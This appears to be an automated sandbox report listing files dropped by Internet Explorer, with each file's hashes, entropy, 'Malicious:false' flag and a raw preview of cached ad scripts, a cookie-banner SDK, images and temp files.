                                                SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                MD5:C4F558C4C8B56858F15C09037CD6625A
                                                SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\httpErrorPagesScripts[1]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):12105
                                                Entropy (8bit):5.451485481468043
                                                Encrypted:false
                                                SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                MD5:9234071287E637F85D721463C488704C
                                                SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\http___cdn.taboola.com_libtrc_static_thumbnails_c3cfcb8c707b14064f9cad58b478df43[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                Category:dropped
                                                Size (bytes):16005
                                                Entropy (8bit):7.974492674158552
                                                Encrypted:false
                                                SSDEEP:384:ZvfZN3HwKYkc4MSXxshJ/mZpPvlKjzJjo4nHaLbjT+EbIZa1c9ajzWQ:ZvfZiKYUMSXxsKZhv0zJs4nmbjT+EQc5
                                                MD5:31D2C3F7BE156B4E917D219F6ADCE3AA
                                                SHA1:0927CE01518F0F900BF1BE4AC7151D7BC05EC059
                                                SHA-256:480455F4C2C040254C88ECEBE33EA31A83A194C939E8F8D88BAE094D59CB9D9A
                                                SHA-512:66A8CAE4B065E6AC2EA8716990AB5B797C8AEF341621A3604D39053096D0AA91FF68ACEBCCBD0B28AFCB5A52CD19CE2C00DD1C5884E47A2ED73CC69601DD1FE9
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF..........................................................+".."+2*(*2<66<LHLdd.............................................+".."+2*(*2<66<LHLdd.......7...."..........5..................................................................R...~.b...53[..Y....ioCo.q...|...1c...z..Q.,..^r..8.!.....12pV..f*T..k..Fqt.p->.....B.l..7p...z..o.. ...0Z.|.Jz..#.X........X"Q..x`....(.so(.......=yoNs.Z.Q..b..w....:CL.!.g..$xA.C..w]...c.">H-.n..U..f.._O..h.=..r._5..d.0.....\.o.....m..zE.'"-P....T...q6Kg)....,..\AGu..|...>.B.|..=:$[...D.!.Kq.\3.n...._.T<.V.Z.Jnb.y.v.....;..5.......'.R..t..k.,#z..+wy..b.C?H..ey.....t.S..!.X.d......U...N..~...$..B..M.n...Y$TuG.#........Y....F..]s...J*.N-.|.p+....<PP.,.1I...l1......V...^.*,.L.U.Na.._..}.........s..;.........`.5.EP......j.Mv.........0.~.W7_.-..0..I....(... .v.d.ul..Y.W..\....[l.......h+...9..jkz..$.>"....'.,q-<........r.qe...V.w......'.#.....p.;q..s.y.i..D..l+.........E}(..o..%...q...~A.......r
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\medianet[1].htm
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):400969
                                                Entropy (8bit):5.487971281504038
                                                Encrypted:false
                                                SSDEEP:6144:zFrkYqP1vG2jnmuynGJ8nKM03VCuPbhErMrSN9Gm9:U1vFjKnGJ8KMGxTAM+fGm9
                                                MD5:39D204B8E434FED04DFFAC662270EC30
                                                SHA1:47C81C4800D098802B3A44928223634684C8AF8E
                                                SHA-256:6A7A19E906F19E73E4682085029515FE70393A2825AB1F7FABD7882EA27B006A
                                                SHA-512:0FE9C2DFF0F2502C9839388E59A90FCD5A01CC0118A7795AA1663ECB1F56FC8AB6BB937C7C6DD0C131C8A2CD48D0F3E1E8CDE8A77575D287CD484EBBCECDAF4E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\medianet[2].htm
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):400969
                                                Entropy (8bit):5.487963952733741
                                                Encrypted:false
                                                SSDEEP:6144:zFrkYqP1vG2jnmuynGJ8nKM03VCuPbhErMrSN9Gm9:U1vFjKnGJ8KMGxTAM+fGm9
                                                MD5:AF385D6E018C7CBCE4A0F70C82C0B7F8
                                                SHA1:611C66628F957809FBD54B33927729088BDCA38F
                                                SHA-256:AD6D23329145672954A2B4304AC46CB3D8521EF0918D5C1E90A8AE0697E06F9B
                                                SHA-512:0ABCB66170E3334470C5AF7F90A9CF2DB3E2E7D0E716A961EF5D58850DB753341B56867B155A8734003D2F3EB3109EB65709C0F3076F921A3890C82DA354511D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var l="",s="",c="",f={},u=encodeURIComponent(navigator.userAgent),g=[],e=0;e<3;e++)g[e]=[];function d(e){void 0===e.logLevel&&(e={logLevel:3,errorVal:e}),3<=e.logLevel&&g[e.logLevel-1].push(e)}function n(){var e=0;for(a=0;a<3;a++)e+=g[a].length;if(0!==e){for(var n,r=new Image,o=f.lurl||"https://lg3-a.akamaihd.net/nerrping.php",t="",i=0,a=2;0<=a;a--){for(e=g[a].length,0;0<e;){if(n=1===a?g[a][0]:{logLevel:g[a][0].logLevel,errorVal:{name:g[a][0].errorVal.name,type:l,svr:s,servname:c,errId:g[a][0].errId,message:g[a][0].errorVal.message,line:g[a][0].errorVal.lineNumber,description:g[a][0].errorVal.description,stack:g[a][0].errorVal.stack}},n=n,!((n="object"!=typeof JSON||"function"!=typeof JSON.stringify?"JSON IS NOT SUPPORTED":JSON.stringify(n)
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\nrrV27452[1].js
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:ASCII text, with very long lines, with no line terminators
                                                Category:dropped
                                                Size (bytes):90611
                                                Entropy (8bit):5.421500848741912
                                                Encrypted:false
                                                SSDEEP:1536:uEuukXGs7RiUGZFVgRdillux5Q3Yzudp9o9uvby3TdXPH6viqQDkjs2i:atiX0di3p8urMfHgjg
                                                MD5:1EB648466B92897E80D5F3A64D02C011
                                                SHA1:624EE532FED7CCBC60DF3433DC3369AADE0F9226
                                                SHA-256:1C9605652D3D876ACA145E7F46F92E669E6A92C4AB27A1CBB454882BD58A1386
                                                SHA-512:1B7CEED799A6994991DCB8938A3B00BD64E1CEC17EC0775FC1CE844604805FEB20BEC3D72823730712BD0CB45B278F30FDD2CBA7319AD605323F667F39BF801C
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]||(c[n]=e(u[n].deps,u[n].callback)),o.push(c[n])):o.push(n));return a(r)?r.apply(this,o):o},_mNDefine=function(e,t,r){if(a(t)&&(r=t,t=[]),void 0===(n=e)||""===n||null===n||(n=t,"[object Array]"!==Object.prototype.toString.call(n))||!a(r))return!1;var n;u[e]={deps:t,callback:r}}}();_mNDefine("modulefactory",[],function(){"use strict";var r={},e={},o={},i={},t={},n={},a={},d={},c={},l={};function g(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(r){e=!1}return o.isResolved=function(){return e},o}return r=g("conversionpixelcontroller"),e=g("browserhinter"),o=g("kwdClickTargetModifier"),i=g("hover"),t=g("mraidDelayedLogging"),n=g("macrokeywords"),a=g("tcfdatamanager"),d=g("l3-reporting-observer-adapter"),c=g("editorial_blocking"),l=g("debuglogs"),{conversionPixelCo
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\otBannerSdk[1].js
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):374818
                                                Entropy (8bit):5.338137698375348
                                                Encrypted:false
                                                SSDEEP:3072:axBt4stoUf3MiPnDxOFvxYyTcwY+OiHeNUQW2SzDZTpl1L:NUfbPnDxOFvxYyY+Oi+yQW2CDZTn1L
                                                MD5:2E5F92E8C8983AA13AA99F443965BB7D
                                                SHA1:D80209C734F458ABA811737C49E0A1EAF75F9BCA
                                                SHA-256:11D9CC951D602A168BD260809B0FA200D645409B6250BD8E8996882EBE3F5A9D
                                                SHA-512:A699BEC040B1089286F9F258343E012EC2466877CC3C9D3DFEF9D00591C88F976B44D9795E243C7804B62FDC431267E1117C2D42D4B73B7E879AEFB1256C644B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: /** .. * onetrust-banner-sdk.. * v6.13.0.. * by OneTrust LLC.. * Copyright 2021 .. */..!function(){"use strict";var o=function(e,t){return(o=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var o in t)t.hasOwnProperty(o)&&(e[o]=t[o])})(e,t)};var r=function(){return(r=Object.assign||function(e){for(var t,o=1,n=arguments.length;o<n;o++)for(var r in t=arguments[o])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};function a(s,i,l,a){return new(l=l||Promise)(function(e,t){function o(e){try{r(a.next(e))}catch(e){t(e)}}function n(e){try{r(a.throw(e))}catch(e){t(e)}}function r(t){t.done?e(t.value):new l(function(e){e(t.value)}).then(o,n)}r((a=a.apply(s,i||[])).next())})}function d(o,n){var r,s,i,e,l={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return e={next:t(0),throw:t(1),return:t(2)},"function"==typeof Symbol&&(e[Symbol.iterator]=function(){return this}),e;function t(t
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\q[1].avi
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):5
                                                Entropy (8bit):2.321928094887362
                                                Encrypted:false
                                                SSDEEP:3:3:3
                                                MD5:5BFA51F3A417B98E7443ECA90FC94703
                                                SHA1:8C015D80B8A23F780BDD215DC842B0F5551F63BD
                                                SHA-256:BEBE2853A3485D1C2E5C5BE4249183E0DDAFF9F87DE71652371700A89D937128
                                                SHA-512:4CD03686254BB28754CBAA635AE1264723E2BE80CE1DD0F78D1AB7AEE72232F5B285F79E488E9C5C49FF343015BD07BB8433D6CEE08AE3CEA8C317303E3AC399
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: 0....
                                                C:\Users\user\AppData\Local\Temp\~DF085197608A4DC602.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):39649
                                                Entropy (8bit):0.5759953467362658
                                                Encrypted:false
                                                SSDEEP:96:kBqoxKAuvScS+vRT6hDXzwcz5gXzwcz54Xzwcz5J:kBqoxKAuqR+vRT6hDk3kzkY
                                                MD5:6CF1AA6E8DE8F92702CAFCF3C6A1F99E
                                                SHA1:D4BFBDD49416FAFE5DA02FF3856AB3A6AA3F2C99
                                                SHA-256:40D608E6EEC2C51518BEE9D2793F36FC316FA6D23195D5BAF3A443FE45408275
                                                SHA-512:A50F2230DB5CB7FE069A70710EA89AF52E0AA703491D3342A1E218019549F174F251B4110F6DE962ADE98B5AA87CEAE53E6FE8EAFEA207E389EE815930D081F9
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Temp\~DF118EEE299414955F.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):29745
                                                Entropy (8bit):0.29981257862648436
                                                Encrypted:false
                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laAL3fX1Y9laF:kBqoxxJhHWSVSEabrP1oQ2y
                                                MD5:CAE8393B215372A28D6CBEE84F7FF6F9
                                                SHA1:957208E6A021495CE08A81B1B90605C227C32158
                                                SHA-256:A13B55ACFF6EF8EEFE7703DB00E61DAE4EBA8B9E11F5C9767FFB955672128BF8
                                                SHA-512:C9F5584B01EDA60DECA0C10FAEC745A6D4BB3A0C4B4F36475C20DF7856D32CEA2C7A2644D2B8341F2E237E8C7A5827D5160BACB69C74CBC78D5BEF12CFDA3E84
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Temp\~DF39E39778E7BB16D3.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):39793
                                                Entropy (8bit):0.6051223796141199
                                                Encrypted:false
                                                SSDEEP:96:kBqoxKAuvScS+w2st2wPdV7kPdV7kPdV7l:kBqoxKAuqR+w2st2wVZkVZkVZl
                                                MD5:EC66E0E9683F2833361C7D7800F4C914
                                                SHA1:29C92DFE12950766A7E8C63ADB1F4C969C1F675B
                                                SHA-256:A6AC90F779A269F039BC30076A7EDDD92AD041D9CDF8F419CBF6AC50E7B4405C
                                                SHA-512:3EC3784C8B25609F61C9B3666CAB0E669D07FFE212D7DC217A97709DE52DBE7D10A1BAC215C686A6E1A5DD0FFEEF8B78E4E368BEB3D71D889A54EB2833BD9219
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Temp\~DF4449BE44FBBC2FD8.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):39777
                                                Entropy (8bit):0.6008909221582213
                                                Encrypted:false
                                                SSDEEP:192:kBqoxKAuqR+FrJ4b5VaMfxxVaMfxFVaMfxK:kBqoxKAuqR+FrJ4b5bfnbfjbfo
                                                MD5:66F267F8ABDF8050856F91435A5A1EA7
                                                SHA1:6083335DEC8E20CEFB675CDBF62E310AC3DE4BA5
                                                SHA-256:1BC48D78E6DB4ACFE763BA69C946747BED0AF0ED061810111E34D03B207EE80D
                                                SHA-512:03F9E06AD14776091E0ECC77A7C0B532185147CBE3C70DC705B92C6691E48555BD92A58E106CB02C8CA2E0FFDA93EDF7E329F32FCD06CB1A219E2B148485B4C7
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Temp\~DF5527FDF90770AFF0.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):29989
                                                Entropy (8bit):0.3309272852524988
                                                Encrypted:false
                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lw+9lwO9l24/9l2Q9laL:kBqoxKAuvScS+RP4+xAy
                                                MD5:41BCE3EFB14B44CC984665B393731115
                                                SHA1:47443CD09A1809DA78EE2B37D7BCDBBAF6644AFD
                                                SHA-256:611860995B6DFCA63B8DE9FE04AC8147FB5BAE9985F9CACDFAF4D7657D63133D
                                                SHA-512:3460CA8D51C9B24611F13A1E5F19C6F6CD41CC51FEFCBAB7FE7487C795FDF75098A8AC7099F3DE5971797F0F7CA2C963B71B67818BC1D3997DCCBC11088EA79F
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Temp\~DF9BFE7BA6DBA411D3.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):19301
                                                Entropy (8bit):2.6061609517574182
                                                Encrypted:false
                                                SSDEEP:96:kBqoI8C7pZaWIWIE3EHECEXEbGCkWJ89q05I/j:kBqoI8C7faWIWIO+LeFhWJOq05I/j
                                                MD5:B9A11973AE575898BB72B8D0DF30DECF
                                                SHA1:72227A96576ACBC1E7E1B760B0AC2E3F70AE2F46
                                                SHA-256:98966BC2F1F0E82D633D765AB7087FBA5ADB6880E7FD07BE82A5F43E89103477
                                                SHA-512:DD42F618D14839F1773BF2B548D9F1A7A417C01209A5A95CC7C642C2A64BF9DE6D624746ABF71962434711C7A47212DBE61D6E14E9337FFF1AAFBA1A91051335
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Temp\~DFC46C0E84A3F2638C.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):39673
                                                Entropy (8bit):0.5799373823464455
                                                Encrypted:false
                                                SSDEEP:96:kBqoxKAuvScS+OIir4iOxS59OxS5lOxS5K:kBqoxKAuqR+OIir4iRhG
                                                MD5:968F1762CC7099E448EFBDCD5BCD5372
                                                SHA1:4C0F11C516044ADB9E90E39991D5FBA8301CDA57
                                                SHA-256:161C3BF0465408792C25E0D43B350ED7D836F051D71CDF43B42382DC11CA0A1F
                                                SHA-512:182F88A709BB332F0F0223822705416CFD844FB797F849CC3FDA569CFA7F33210F7C2EE848997C15D623AB74E71748BA4227E44F7E36EC9D3E74EE2CF96F2A65
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Temp\~DFC4C5B676A78A1460.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):29989
                                                Entropy (8bit):0.33092728525249876
                                                Encrypted:false
                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwCl9lwCF9l2CL/9l2CY:kBqoxKAuvScS+C2CwCL+CmC/y
                                                MD5:02BC709B3080A6E41719894E10F25225
                                                SHA1:0FF1957790E8ED3D27A5F191729EF333C79514A3
                                                SHA-256:5325ABD8C9B7B59B2B4CB79FFEF57B2D46216554F554C9EB0D270E947A5C8606
                                                SHA-512:1451030F59C5CA2B1D06C2C99F1D89348FA0E3936156111E0F50C88BA350CFFECB6174A200D529F69D41610384D5A68ADD4F906978F546E1028863F7D49D4FC7
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Temp\~DFE529B12301E47C8A.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):34893
                                                Entropy (8bit):0.44679169142112596
                                                Encrypted:false
                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwP9lwP9l2R9l2R9l/p2:kBqoxKAuvScS+IOEVpIpyDEJhvgo86j/
                                                MD5:189D15DAFCE874E4EF4B56203F29701D
                                                SHA1:000231A1CC2D04218646164305122418E5A70623
                                                SHA-256:F3CEB7F1994F76546F030AC1A78D8D482CBAE0A0FE2C357761B79DF75B5B37D3
                                                SHA-512:22D8D7D0B1D450ABC3B5382247CEC74A5B86A3D75DD9AC579FCDE200A81655BDADAF08D1118E3BD463D7E0D6BAB93CE3E5997369ED629A27757CFF6C8896D74A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Temp\~DFE8AED9196A92F002.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):29989
                                                Entropy (8bit):0.33026037405172515
                                                Encrypted:false
                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwO9lwe9l2o/9l2A9la7:kBqoxKAuvScS+hfo+BQy
                                                MD5:870ABFAA77A36A00389CB2134FE3C841
                                                SHA1:512A724D0212B467FFBA5BDC5034148349053B6A
                                                SHA-256:4DF31679F57DC5A4A6E44DCAAF9706730FB607D3670EE991377170EB44C56471
                                                SHA-512:AA9384AEE2CFEE09C060BE69F477B0478CC18B6262E862DE87C1578EA6279D6058BDA87649F48304A343491F625884B95A05FEE7546021351B9AF27D01F0971B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Temp\~DFF620ECB1EB466A17.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):196080
                                                Entropy (8bit):3.1326329377574704
                                                Encrypted:false
                                                SSDEEP:3072:vZ/2Bfcdmu5kgTzGtLZ/2Bfc+mu5kgTzGt:2I
                                                MD5:C1B9C4331E37D5DBB55D8F7CC3156C7C
                                                SHA1:B78187D611A043B389E38A44D0E42A8B95DEBAD5
                                                SHA-256:A6923658A386E2B4110E2AF96784BFC5D56E84F74E3B169A3F75DCB4F8369977
                                                SHA-512:AC1A4F5A0DD2CB6B763ADF1421AF2A942C319EEB96C7395DCAAB644D842CDCB0E0023C86E32423580A3B0722A20428090816F8DCC34BECB15CC954C4677CD7E1
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Temp\~DFF7511E7F68021997.TMP
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):29989
                                                Entropy (8bit):0.3304156545473839
                                                Encrypted:false
                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwme9lwmu9l2mY/9l2mO:kBqoxKAuvScS+mxmvmY+mRmgy
                                                MD5:84F1D285EC1760A5CAF51AFE8C01B85A
                                                SHA1:660E4DD61DDE2835D75A0B154293162C49C89164
                                                SHA-256:17C4887D66A466F662949F341AA9F3CFDBE7039C4C962F8BFDBAAD6FBDA9540A
                                                SHA-512:64ACA0605200C92F6E9324079ECBC5E236343866DE3E71B42324DE47D38BA18A577D6D6D1E32B93349E0F9A02C72A508229E52BD30B72D32970457B932CAB7C2
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms (copy)
                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):5149
                                                Entropy (8bit):3.183838794552799
                                                Encrypted:false
                                                SSDEEP:48:bmdirPaI0IC9GrIoUAsASFimdirPaI0Ih683GrIoUAczbmdirPaI0Ix9GrIoUAVt:bpPaj99S0AJNpPaj+3S0A4pPaj29S0Af
                                                MD5:05FC1A57B94BA22548443982E7F842C3
                                                SHA1:0DDD60F8A850B26E9609B08E28A73E1B53F737E6
                                                SHA-256:F70317B844638C9C537B0BBCBA5C313B17C0645E43D1E926EA42CED71C5FDD22
                                                SHA-512:DE7F1031210F70FE1AF17C64F59D9FD88F32935FBA865389E2F087E0824A19145EE42E50C3817FA97BE1823C492CBCA23C7F82B4C7EEBF3A7C6CC36C4FFE7FEC
                                                Malicious:false
                                                Reputation:unknown
